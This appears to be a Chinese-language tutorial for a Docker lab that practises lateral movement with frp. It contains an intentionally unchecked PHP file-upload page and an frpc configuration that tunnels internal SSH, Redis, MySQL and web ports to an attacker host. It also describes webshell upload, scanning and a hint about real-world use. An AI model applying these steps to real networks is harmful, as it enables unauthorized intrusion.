frp使用练习

怎么用

简单来说就是，靶机传个客户端上去，然后自己的攻击机运行服务端

拓扑

靶场设计

详情

设定以下固定 IP 地址：

• 内网子网：172.20.0.0/24
• 出网的机器(frps_server) 在内网中的 IP：172.20.0.3
• 堡垒机内网中的 IP：172.20.0.10
• 数据库在内网中的IP：172.20.0.20
  整个操作思路：
  靶场总共有三台机子，一台能出网，两台台不出网，出网的那台模拟的是被web渗透成功上传了frpc，然后攻击机上运行frps，两边一运行，代理上了内网流量，攻击机以出网的机子为跳板能访问到不出网的内网机器

所需配置文件文件

frps.ini

bindport = 7000

frpc.ini

[common]
server_addr = 192.168.28.142
server_port = 7000

[internal_target1_web]
type = tcp
local_ip = 172.20.0.10
local_port = 80
remote_port = 8080

[internal_target1_ssh]
type = tcp
local_ip = 172.20.0.10
local_port = 22
remote_port = 2222

[internal_target1_redis]
type = tcp
local_ip = 172.20.0.10
local_port = 6379
remote_port = 63790

[internal_target2_mysql]
type = tcp
local_ip = 172.20.0.20
local_port = 3306
remote_port = 33061

Dockerfile.compromised

FROM ubuntu:latest
ARG DEBIAN_FRONTEND=noninteractive
RUN apt update && apt install -y nginx php-fpm php-cli curl iproute2 net-tools openssh-server iputils-ping && \
    rm -rf /var/lib/apt/lists/*
RUN mkdir -p /var/www/html/uploads && chown -R www-data:www-data /var/www/html
RUN which ping || (echo "错误：ping 命令未找到，安装失败！" && exit 1)
COPY nginx_vhost_compromised.conf /etc/nginx/sites-available/default
RUN rm /etc/nginx/sites-enabled/default && ln -s /etc/nginx/sites-available/default /etc/nginx/sites-enabled/
COPY upload.html /var/www/html/
COPY upload.php /var/www/html/
EXPOSE 80
EXPOSE 22
RUN useradd -m webadmin && echo "webadmin:securepassword" | chpasswd
CMD service nginx start && service php$(php -r 'echo PHP_MAJOR_VERSION.".".PHP_MINOR_VERSION;')-fpm start && service ssh start && tail -f /dev/null

nginx_vhost_compromised.conf

server {
    listen 80 default_server;
    listen [::]:80 default_server;
    root /var/www/html;
    index index.html index.htm index.nginx-debian.html;
    server_name _;
    location / { try_files $uri $uri/ =404; }
    location ~ \.php$ {
        include snippets/fastcgi-php.conf;
        # !!!! 根据容器实际 PHP 版本调整 socket 文件名 !!!!
        fastcgi_pass unix:/run/php/php8.3-fpm.sock;
    }
    location ~ /\.ht { deny all; }
}

upload.html

<!DOCTYPE html>
<html>
<head>
    <title>Simple File Upload</title>
</head>
<body>
    <h2>Upload Files</h2>
    <form action="upload.php" method="post" enctype="multipart/form-data">
        Select file to upload:
        <input type="file" name="fileToUpload" id="fileToUpload"><br><br>
        <input type="submit" value="Upload File" name="submit">
    </form>
</body>
</html>

upload.php

<?php
$target_dir = "uploads/";
$target_file = $target_dir . basename($_FILES["fileToUpload"]["name"]);
$uploadOk = 1;

// Check if uploads directory exists, create if not
if (!is_dir($target_dir)) {
    mkdir($target_dir, 0777, true);
}

if (move_uploaded_file($_FILES["fileToUpload"]["tmp_name"], $target_file)) {
    echo "The file ". htmlspecialchars( basename( $_FILES["fileToUpload"]["name"])). " has been uploaded to " . $target_file;
} else {
    echo "Sorry, there was an error uploading your file.";
}
?>

Dockerfile.target1

FROM ubuntu:latest
ARG DEBIAN_FRONTEND=noninteractive
RUN apt update && apt install -y nginx openssh-server redis-server iproute2 net-tools mysql-client iputils-ping php-fpm php-cli && \
    rm -rf /var/lib/apt/lists/*
RUN which ping || (echo "错误：ping 命令未找到，安装失败！" && exit 1)
RUN mkdir -p /var/www/html/uploads && chown -R www-data:www-data /var/www/html
COPY nginx_vhost_target1.conf /etc/nginx/sites-available/default
RUN rm /etc/nginx/sites-enabled/default && ln -s /etc/nginx/sites-available/default /etc/nginx/sites-enabled/
COPY internal_dashboard.html /var/www/html/index.html
COPY target1_phpinfo.php /var/www/html/phpinfo.php
EXPOSE 80
EXPOSE 22
EXPOSE 6379
RUN useradd -m appuser && echo "appuser:securepassword" | chpasswd
CMD service nginx start && service php$(php -r 'echo PHP_MAJOR_VERSION.".".PHP_MINOR_VERSION;')-fpm start && service ssh start && service redis-server start && tail -f /dev/null

nginx_vhost_target1.conf

server {
    listen 80 default_server;
    listen [::]:80 default_server;
    root /var/www/html;
    index index.html index.htm index.nginx-debian.html; # 确保包含 index.html
    server_name _;
    location / { try_files $uri $uri/ =404; }
    location ~ \.php$ {
        include snippets/fastcgi-php.conf;
        # !!!! 根据容器实际 PHP 版本调整 socket 文件名 !!!!
        fastcgi_pass unix:/run/php/php8.3-fpm.sock;
    }
    location ~ /\.ht { deny all; }
}

internal_dashboard.html

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Internal Network Access Portal</title>
    <style>
        body {
            font-family: 'Segoe UI', Tahoma, Geneva, Verdana, sans-serif;
            line-height: 1.6;
            margin: 0;
            padding: 20px;
            background-color: #f4f4f4;
            color: #333;
        }
        .container {
            max-width: 900px;
            margin: 20px auto;
            background: #fff;
            padding: 30px;
            border-radius: 8px;
            box-shadow: 0 2px 10px rgba(0, 0, 0, 0.1);
        }
        h1, h2 {
            color: #0056b3;
            border-bottom: 2px solid #0056b3;
            padding-bottom: 10px;
            margin-top: 20px;
        }
        .service-list {
            list-style: none;
            padding: 0;
        }
        .service-list li {
            background: #e9e9e9;
            margin-bottom: 10px;
            padding: 15px;
            border-radius: 5px;
            border-left: 5px solid #007bff;
        }
        .service-list li strong {
            color: #0056b3;
        }
        footer {
            text-align: center;
            margin-top: 40px;
            font-size: 0.9em;
            color: #777;
        }
    </style>
</head>
<body>
    <div class="container">
        <h1>Welcome to the Internal Network Access Portal</h1>
        <p>This machine serves as an internal application host and access point for authorized personnel.</p>

        <h2>System Status Overview (Simulated)</h2>
        <p>Status: <strong style="color: green;">Operational</strong></p>
        <p>Last Update: 2025-04-19 18:00:00 CST</p>
        <p>Current Load: Normal</p>

        <h2>Accessible Internal Services (Via this host or connected systems)</h2>
        <ul class="service-list">
            <li>
                <strong>Internal Web Application:</strong> <a href="http://172.20.0.10:80/">http://172.20.0.10/</a> (This server)
                <br>Includes sample pages like <a href="http://172.20.0.10:80/phpinfo.php">PHP Info</a> (if enabled/configured).
            </li>
            <li>
                <strong>SSH Access:</strong> Available via Port 22 (Command Line Access)
            </li>
            <li>
                <strong>Internal Cache:</strong> Redis Service available on Port 6379
            </li>
            <li>
                <strong>Database Server:</strong> <a href="http://172.20.0.20:3306/">Database Server</a> (Simulated Link)
                <br>MySQL Service available on 172.20.0.20:3306
            </li>
             <li>
                <strong>Compromised Web Entry:</strong> <a href="http://172.20.0.3:80/">Compromised Web Server</a> (Simulated Link)
                <br>Original entry point, should be patched.
            </li>
        </ul>

        <p>Access to services listed above may require proper authentication or further internal network navigation.</p>
    </div>

    <footer>
        &copy; 2025 Internal IT Department. All rights reserved.
    </footer>
</body>
</html>

target1_phpinfo.php

<?php phpinfo(); ?>

docker-compose.yml

version: '3.8'

networks:
  internal_net:
    driver: bridge
    ipam:
      config:
        - subnet: 172.20.0.0/24

services:
  # 模拟 "出网的机器" / 入口 Web 服务器 (Compromised)
  # IP: 172.20.0.3 (内部), 映射端口到 192.168.28.143:8000 (外部)
  compromised:
    container_name: compromised_vm
    build:
      context: . # 指定 Dockerfile 所在的构建上下文目录 (当前目录)
      dockerfile: Dockerfile.compromised # 指定 Dockerfile 文件名
    networks:
      internal_net:
        ipv4_address: 172.20.0.3
      # 连接到 Docker 默认网络，以便访问 192.168.28.142
    ports:
      - "8000:80" # 映射容器 Web 端口到宿主机 8000
      - "2200:22" # 映射容器 SSH 端口到宿主机 2200 (模拟管理入口)
    restart: unless-stopped

  # 模拟 "内网应用服务器/堡垒机" (Target 1)
  # IP: 172.20.0.10 (内部)
  internal_target_1:
    container_name: internal_target_1_vm
    build:
      context: . # 指定 Dockerfile 所在的构建上下文目录 (当前目录)
      dockerfile: Dockerfile.target1 # 指定 Dockerfile 文件名
    networks:
      internal_net:
        ipv4_address: 172.20.0.10
    restart: unless-stopped

  # 模拟 "内网数据库服务器" (Target 2)
  # IP: 172.20.0.20 (内部)
  internal_target_2:
    container_name: internal_target_2_vm
    image: mysql:latest # 使用官方 MySQL 镜像
    environment:
      MYSQL_ROOT_PASSWORD: supersecurepassword # Root 密码
      MYSQL_DATABASE: webapp_db             # 创建一个数据库
      MYSQL_USER: webapp                    # 创建一个用户
      MYSQL_PASSWORD: password123           # 用户密码
    networks:
      internal_net:
        ipv4_address: 172.20.0.20
    volumes:
      - mysql_data:/var/lib/mysql # 数据持久化
    restart: unless-stopped

volumes:
  mysql_data: {} # 定义数据卷

搭建过程

mkdir frp_train;cd frp_train

然后创建那些文档，然后直接构建就行

sudo docker compose up -d --build

测试访问

实操

模拟一个有任意文件上传漏洞的站
直接访问：http://192.168.28.145:8000/upload.html

传个马测试一下

然后蚁剑啊哥斯拉什么的连接一下，直接弹shell


传个fscan上去扫一下

发现其他目标：

接下来就是最主要的目的——上代理了
传个frpc上去

攻击机运行服务端

./frps -c frps.ini

靶机运行客户端

./frpc -c frpc.ini

frps接收

根据配置文件所示，172.20.0.10这台机子是代理到了攻击机的8080端口，测试

测试ssh服务

ssh appuser@192.168.28.142 -p 2222

测试redis

172.20.0.20这台机子是代理到了33061端口，测试

总结

那么真实渗透，应该就是代理到自己的公网服务器上了，然后访问公网服务器来进行进一步渗透